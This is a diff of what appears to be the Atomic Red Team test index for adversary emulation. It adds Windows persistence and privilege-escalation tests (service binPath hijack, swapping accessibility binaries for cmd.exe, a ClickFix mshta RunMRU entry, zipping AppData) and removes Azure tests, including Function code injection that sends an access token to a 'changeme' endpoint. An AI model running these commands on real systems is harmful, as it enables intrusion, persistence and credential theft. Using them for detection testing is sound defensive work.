-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {\n    # Download file for cleanup\n    $tmpOriginalFileName
-          = [System.IO.Path]::GetFileName(\"#{file_path}\")\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + $tmpOriginalFileName)\n
-          \   az storage file download --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors
-          --dest $tmpOriginalFunctionCode\n\n    if ($LASTEXITCODE -eq 0) {\n        #
-          Upload new funciton code if download of existing code succeeded\n        if
-          (\"#{execution_option}\" -eq \"insert_code\") {\n            # Download
-          file from file share for injection\n            $tmpFunctionCode = Join-Path
-          $env:temp/ (\"T1550.001_tmp_to_inject_\" + $tmpOriginalFileName)\n            az
-          storage file download --account-name \"#{storage_account_name}\" --share-name
-          \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors --dest $tmpFunctionCode\n
-          \           \n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code download failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"File downloaded: $($tmpFunctionCode)\"\n            \n
-          \           $insertContent = Get-Content -Path \"#{code_to_insert_path}\"
-          -Raw  # Load the content of the insert file\n            \n            $content
-          = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file\n            $content
-          = $insertContent + \"`n\" + $content     # Insert the new code at the beginning\n
-          \           $content | Set-Content -Path $tmpFunctionCode       # Write
-          the modified content to the file\n            \n            # Upload file
-          to file share\n            az storage file upload --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --source $tmpFunctionCode
-          --only-show-errors\n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code upload failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"Uploaded the tampered file\"\n        } elseif
-          (\"#{execution_option}\" -eq \"replace_file\") {\n            az storage
-          file upload --account-name \"#{storage_account_name}\" --share-name \"#{file_share_name}\"
-          -p \"#{file_path}\" --source \"#{code_to_insert_path}\" --only-show-errors\n
-          \           if ($LASTEXITCODE -ne 0) {\n                Write-Output \"Function
-          code upload failed.\"\n                exit 1\n            }\n            Write-Output
-          \"Uploaded the tampered file\"\n        } else {\n            Write-Output
-          \"Please choose a valid execution_option\"\n            exit 1\n        }\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + $tmpOriginalFileName)
-          az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original f file if upload succeeded
-              if ("#{execution_option}" -eq "insert_code") {
-                  $tmpFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_to_inject_" + $tmpOriginalFileName)
-                  Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
-                  Write-Output "Deleted tmp file: $($tmpFunctionCode)"
-              }
-
-              # Delete tmp original file
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
+    atomic_tests: []
  T1078.004:
    technique:
      type: attack-pattern
@@ -36815,14 +36877,25 @@ privilege-escalation:
        Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.
      supported_platforms:
      - windows
+      input_arguments:
+        service_name:
+          description: The name of the service that will be modified
+          type: string
+          default: Fax
+        service_binpath:
+          description: The default value for the binary path of the service
+          type: string
+          default: C:\WINDOWS\system32\fxssvc.exe
      executor:
        name: command_prompt
        elevation_required: true
        command: |
-          sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
-          sc start Fax
-        cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul
-          2>&1
+          sc config #{service_name} binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
+          sc start #{service_name}
+        cleanup_command: 'sc config #{service_name} binPath= "#{service_binpath}"
+          >nul 2>&1
+
+          '
    - name: Service Installation CMD
      auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6
      description: |
@@ -42037,6 +42110,47 @@ privilege-escalation:
          '
        name: command_prompt
        elevation_required: true
+    - name: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe
+      auto_generated_guid: 825ba8ca-71cc-436b-b1dd-ea0d5e109086
+      description: 'Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe.
+        This allows the user to launch an elevated command prompt by pressing the
+        Windows Key + P on the login screen.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\DisplaySwitch.exe /A
+          icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
+    - name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+      auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+      description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt from the login screen
+        by locking and then unlocking the computer after toggling on any of the accessibility
+        tools in the Accessibility menu.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\AtBroker.exe /A
+          icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1055.004:
    technique:
      type: attack-pattern
@@ -44456,6 +44570,9 @@ privilege-escalation:
          default: C:\Windows\System32\calc.exe
      executor:
        command: |
+          if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer")){
+            New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          }
          if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
            New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
          }
@@ -46563,6 +46680,14 @@ privilege-escalation:
      supported_platforms:
      - windows
      input_arguments:
+        script_download_url:
+          description: Download url for Start-Hollow.ps1
+          type: string
+          default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
+        script_path:
+          description: Path to Start-Hollow.ps1
+          type: path
+          default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
        hollow_binary_path:
          description: Path of the binary to hollow (executable that will run inside
            the sponsor)
@@ -46582,7 +46707,7 @@ privilege-escalation:
          default: notepad
      executor:
        command: |
-          . "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
+          . "#{script_path}"
          $ppid=Get-Process #{parent_process_name} | select -expand id
          Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
        cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
@@ -46590,6 +46715,21 @@ privilege-escalation:

          '
        name: powershell
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Start-Hollow.ps1 must be installed
+
+          '
+        prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          try {
+            iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
+          } catch {
+            Write-Error $_
+            Exit 1
+          }
    - name: RunPE via VBA
      auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
      description: 'This module executes notepad.exe from within the WINWORD.EXE process
@@ -46675,7 +46815,7 @@ privilege-escalation:
          -program "#{hollow_binary_path}" -debug

          '
-        cleanup_command: |-
+        cleanup_command: |
          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
  T1068:
@@ -53679,6 +53819,21 @@ execution:
        cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security"
          /v "VBAWarnings" /f
        name: powershell
+    - name: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
+      auto_generated_guid: 3f3120f0-7e50-4be2-88ae-54c61230cb9f
+      description: |
+        Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
+        This technique relies on user interaction (Win+R + Enter) to trigger execution.
+        Used in social engineering campaigns that aim to bypass traditional startup methods.
+        Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
+      supported_platforms:
+      - windows
+      executor:
+        command: Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
+          -Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
+        cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
+          -Name "atomictest" -ErrorAction SilentlyContinue
+        name: powershell
  T1053.003:
    technique:
      type: attack-pattern
@@ -61168,14 +61323,25 @@ persistence:
        Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.
      supported_platforms:
      - windows
+      input_arguments:
+        service_name:
+          description: The name of the service that will be modified
+          type: string
+          default: Fax
+        service_binpath:
+          description: The default value for the binary path of the service
+          type: string
+          default: C:\WINDOWS\system32\fxssvc.exe
      executor:
        name: command_prompt
        elevation_required: true
        command: |
-          sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
-          sc start Fax
-        cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul
-          2>&1
+          sc config #{service_name} binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
+          sc start #{service_name}
+        cleanup_command: 'sc config #{service_name} binPath= "#{service_binpath}"
+          >nul 2>&1
+
+          '
    - name: Service Installation CMD
      auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6
      description: |
@@ -68263,6 +68429,47 @@ persistence:
          '
        name: command_prompt
        elevation_required: true
+    - name: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe
+      auto_generated_guid: 825ba8ca-71cc-436b-b1dd-ea0d5e109086
+      description: 'Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe.
+        This allows the user to launch an elevated command prompt by pressing the
+        Windows Key + P on the login screen.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\DisplaySwitch.exe /A
+          icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
+    - name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+      auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+      description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt from the login screen
+        by locking and then unlocking the computer after toggling on any of the accessibility
+        tools in the Accessibility menu.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\AtBroker.exe /A
+          icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1136.002:
    technique:
      type: attack-pattern
@@ -70564,6 +70771,9 @@ persistence:
          default: C:\Windows\System32\calc.exe
      executor:
        command: |
+          if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer")){
+            New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          }
          if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
            New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
          }
@@ -84859,6 +85069,54 @@ collection:
        cleanup_command: 'del #{output_file}

          '
+    - name: Copy and Compress AppData Folder
+      auto_generated_guid: 05e8942e-f04f-460a-b560-f7781257feec
+      description: 'Copies the AppData folder, compresses it, and cleans up temporary
+        files.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        destination_folder:
+          type: Path
+          default: "$env:USERPROFILE\\Desktop\\AppDataCopy"
+          description: Temporary copy location
+        zip_file_path:
+          type: Path
+          default: "$env:USERPROFILE\\Desktop\\AppDataBackup.zip"
+          description: ZIP archive path
+      dependencies:
+      - description: Requires admin and .NET compression libraries
+        prereq_command: |
+          if (-not ([Security.Principal.WindowsPrincipal] `
+              [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(`
+              [Security.Principal.WindowsBuiltInRole]::Administrator)) { exit 1 }
+          if (-not (Test-Path "$env:USERPROFILE\AppData")) { exit 1 }
+        get_prereq_command: 'Run PowerShell as Administrator and ensure .NET compression
+          assemblies are available.
+
+          '
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $AppData="$env:USERPROFILE\AppData"
+          $Copy="#{destination_folder}"
+          $Zip="#{zip_file_path}"
+
+          if (Test-Path $Copy) { Remove-Item $Copy -Recurse -Force }
+          New-Item -ItemType Directory -Path $Copy | Out-Null
+
+          Get-ChildItem $AppData -Recurse -Force | ForEach-Object {
+            $rel = $_.FullName.Substring($AppData.Length + 1)
+            $dest = Join-Path $Copy $rel
+            if ($_.PSIsContainer) { New-Item -ItemType Directory -Path $dest -Force | Out-Null }
+            else { Copy-Item $_.FullName -Destination $dest -Force -ErrorAction SilentlyContinue }
+          }
+
+          Add-Type -AssemblyName System.IO.Compression.FileSystem
+          [System.IO.Compression.ZipFile]::CreateFromDirectory($Copy, $Zip, [System.IO.Compression.CompressionLevel]::Optimal, $false)
  T1113:
    technique:
      type: attack-pattern
@@ -85781,13 +86039,22 @@ collection:
    atomic_tests:
    - name: using device audio capture commandlet
      auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95
-      description: "[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)\n"
+      description: |
+        Uses AudioDeviceCmdlets to set the default recording device and simulate audio capture.
+        Module repo: [AudioDeviceCmdlets](https://github.com/frgnca/AudioDeviceCmdlets)
      supported_platforms:
      - windows
+      dependencies:
+      - description: AudioDeviceCmdlets module must be installed
+        prereq_command: "if (Get-Module -ListAvailable -Name AudioDeviceCmdlets) {
+          exit 0 } else { exit 1 } \n"
+        get_prereq_command: "Install with: Install-Module -Name AudioDeviceCmdlets
+          -Force\" \n"
      executor:
-        command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
-
-          '
+        command: |
+          $mic = Get-AudioDevice -Recording
+          Set-AudioDevice -ID $mic.ID
+          Start-Sleep -Seconds 5
        name: powershell
    - name: Registry artefact when application use microphone
      auto_generated_guid: 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a
@@ -86652,99 +86919,6 @@ collection:
      - 'Cloud Storage: Cloud Storage Access'
      identifier: T1530
    atomic_tests:
-    - name: Azure - Enumerate Azure Blobs with MicroBurst
-      auto_generated_guid: 3dab4bcc-667f-4459-aea7-4162dd2d6590
-      description: "Upon successful execution, this test will utilize a wordlist to
-        enumerate the public facing containers and blobs of a specified Azure storage
-        account. \nSee https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/
-        . \n"
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        base:
-          description: Azure blob keyword to enumerate (Example, storage account name)
-          type: string
-          default: secure
-        output_file:
-          description: File to output results to
-          type: string
-          default: "$env:temp\\T1530Test1.txt"
-        wordlist:
-          description: File path to keywords for search permutations
-          type: string
-          default: PathToAtomicsFolder\..\ExternalPayloads\permutations.txt
-      dependency_executor_name: powershell
-      dependencies:
-      - description: 'The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads.
-
-          '
-        prereq_command: 'if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"){exit
-          0} else {exit 1}
-
-          '
-        get_prereq_command: |
-          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-          invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
-      - description: 'The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads.
-
-          '
-        prereq_command: 'if (test-path "#{wordlist}"){exit 0} else {exit 1}
-
-          '
-        get_prereq_command: 'invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt"
-          -outfile "#{wordlist}"
-
-          '
-      executor:
-        command: |
-          import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
-          Invoke-EnumerateAzureBlobs -base #{base} -permutations "#{wordlist}" -outputfile "#{output_file}"
-        cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
-
-          '
-        name: powershell
-    - name: Azure - Scan for Anonymous Access to Azure Storage (Powershell)
-      auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0
-      description: "Upon successful execution, this test will test for anonymous access
-        to Azure storage containers by invoking a web request and outputting the results
-        to a file. \nThe corresponding response could then be interpreted to determine
-        whether or not the resource/container exists, as well as other information.
-        \nSee https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service
-        \    \n"
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        base_name:
-          description: Azure storage account name to test
-          type: string
-          default: T1530Test2
-        output_file:
-          description: File to output results to
-          type: string
-          default: "$env:temp\\T1530Test2.txt"
-        container_name:
-          description: Container name to search for (optional)
-          type: string
-          default:
-        blob_name:
-          description: Blob name to search for (optional)
-          type: string
-          default:
-      executor:
-        command: |
-          try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
-          catch [system.net.webexception]
-          {if($_.Exception.Response -ne $null)
-          {$Response = $_.Exception.Response.GetResponseStream()
-          $ReadResponse = New-Object System.IO.StreamReader($Response)
-          $ReadResponse.BaseStream.Position = 0
-          $responseBody = $ReadResponse.ReadToEnd()}
-          else {$responseBody = "The storage account could not be anonymously accessed."}}
-          "Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
-        cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
-
-          '
-        name: powershell
    - name: AWS - Scan for Anonymous Access to S3
      auto_generated_guid: 979356b9-b588-4e49-bba4-c35517c484f5
      description: "Upon successful execution, this test will test for anonymous access
@@ -91698,7 +91872,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -91775,223 +91949,7 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
-    atomic_tests:
-    - name: Azure - Functions code upload - Functions code injection via Blob upload
-      auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
-      description: "This test injects code into an Azure Function (RCE).\n\nAttack
-        idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nSimilar
-        to T1550.001 \"Azure - Functions code upload - Functions code injection to
-        retrieve the Functions identity access token\", the depicted code injection
-        scenario tampers the source code of Azure Functions to perform Subscription
-        Privilege Escalation by retrieving the identity access token of an Azure functions
-        instance. In this case, the prepared zip file (underlying package for a Function)
-        is expected to contain the tampered function presented in src/code_to_insert.py.
-        Note that the endpoint https://changeme.net needs to be adapted in your packed
-        function code.\n\nNote:\n- The Azure Function modified in this test must be
-        hosted via Azure Blob storage (Info on storage considerations for Azure Function:
-        https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
-        \n- For Function code upload to Azure Functions that are hosted via Azure
-        Files in a File Share, refer to T1550.001 \"Azure - Functions code upload
-        - Functions code injection to retrieve the Functions identity access token\".\n-
-        The required input fields can be retrieved in a reconnaissance step in test
-        T1619 \"Azure - Enumerate Storage Account Objects via Key-based authentication
-        using Azure CLI\". The code of function apps may be inspected and prepared
-        from the result of test T1530 \"Azure - Dump Azure Storage Account Objects
-        via Azure CLI\".\n\nRequirements:\n- The test is intended to be executed in
-        interactive mode (with -Interactive parameter) in order to complete the az
-        login command when MFA is required.\n- The EntraID user must have the role
-        \"Storage Account Contributor\", or a role with similar permissions."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        container_name:
-          type: string
-          default: container_name_example
-          description: Name of the container that contains the function blob
-        blob_name:
-          type: string
-          default: blob_example
-          description: Name of the function blob
-        file_path_blob:
-          type: path
-          default: "$env:temp/T1550.001_function_code.zip"
-          description: Path to the function code file to upload as blob
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {    \n    $connectionString = az storage account
-          show-connection-string --name \"#{storage_account_name}\" --query connectionString
-          --output tsv\n\n    # Download blob for cleanup\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + \"#{blob_name}\")\n
-          \   az storage blob download --connection-string $connectionString --container-name
-          \"#{container_name}\" --name \"#{blob_name}\" --file $tmpOriginalFunctionCode
-          --overwrite true\n\n    if ($LASTEXITCODE -eq 0) {\n        # Upload new
-          blob version if download of existing blob succeeded\n        az storage
-          blob upload --connection-string $connectionString --container-name \"#{container_name}\"
-          --name \"#{blob_name}\" --file \"#{file_path_blob}\" --overwrite true\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}\n"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + "#{blob_name}")
-          az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original blob file if upload succeeded
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
-    - name: Azure - Functions code upload - Functions code injection via File Share
-        modification to retrieve the Functions identity access token
-      auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
-      description: "This test injects code into an Azure Function (RCE) to perform
-        Subscription Privilege Escalation by retrieving the identity access token
-        of an Azure functions instance.\n\nAttack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nOnce
-        executed, the \"https://changeme\" will retrieve the access token when the
-        function app is executed on behalf of the tenant. The function may be triggered
-        manually from authorized people, triggered in regular intervals, or in various
-        other ways. The access token can then be used to perform further attack steps
-        with the permissions that the function app holds (e.g. listening virtual machines).\n\nNote:
-        \n- The Azure Function modified in this test must be hosted via Azure Files
-        in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).\n-
-        For Function code upload to Azure Functions that are hosted via Azure Blob
-        storage, refer to T1550.001 \"Azure - Functions code upload - Functions code
-        injection via Blob upload\".\n- The required input fields can be retrieved
-        in a reconnaissance step in test T1619 \"Azure - Enumerate Storage Account
-        Objects via Key-based authentication using Azure CLI\". The code of function
-        apps may be inspected and prepared from the result of test T1530 \"Azure -
-        Dump Azure Storage Account Objects via Azure CLI\".\n- Important: Change the
-        https://changeme.net in code_to_insert_path to a self-controlled endpoint.
-        This endpoint can be hosted e.g. as request bin via Pipedream to display the
-        body of incoming POST requests.\n- The default injected code to retrieve the
-        access token can be replaced by arbitrary other code. In this case: Replace
-        the code defined in code_to_insert_path\n\nRequirements:\n- The test is intended
-        to be executed in interactive mode (with -Interactive parameter) in order
-        to complete the az login command when MFA is required.\n- The EntraID user
-        must have the role \"Storage Account Contributor\", or a role with similar
-        permissions.\n\nExecution options: Defined by the input field execution_option\n-
-        insert_code: This option (1) downloads the existing funciton code into a tmp
-        file, (2) injects the code from code_to_insert_path at the beginning of the
-        file, and (3) uploads the tampered file to the targeted Azure Function code
-        (Azure File Share File).\n- replace_file: This option uploads the function
-        code defined in code_to_insert_path to the targeted Azure Function code (Azure
-        File Share File)."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        execution_option:
-          type: string
-          default: insert_code
-          description: Chooses execution option insert_code, or replace_file
-        file_share_name:
-          type: string
-          default: file_share_name_example
-          description: Name of the file share that is related to the Function
-        file_path:
-          type: path
-          default: site/wwwroot/function_app.py
-          description: Path to the Function file in the file share
-        code_to_insert_path:
-          type: path
-          default: "$PathToAtomicsFolder/T1550.001/src/code_to_insert.py"
-          description: The code that will be injected into the Function
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {\n    # Download file for cleanup\n    $tmpOriginalFileName
-          = [System.IO.Path]::GetFileName(\"#{file_path}\")\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + $tmpOriginalFileName)\n
-          \   az storage file download --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors
-          --dest $tmpOriginalFunctionCode\n\n    if ($LASTEXITCODE -eq 0) {\n        #
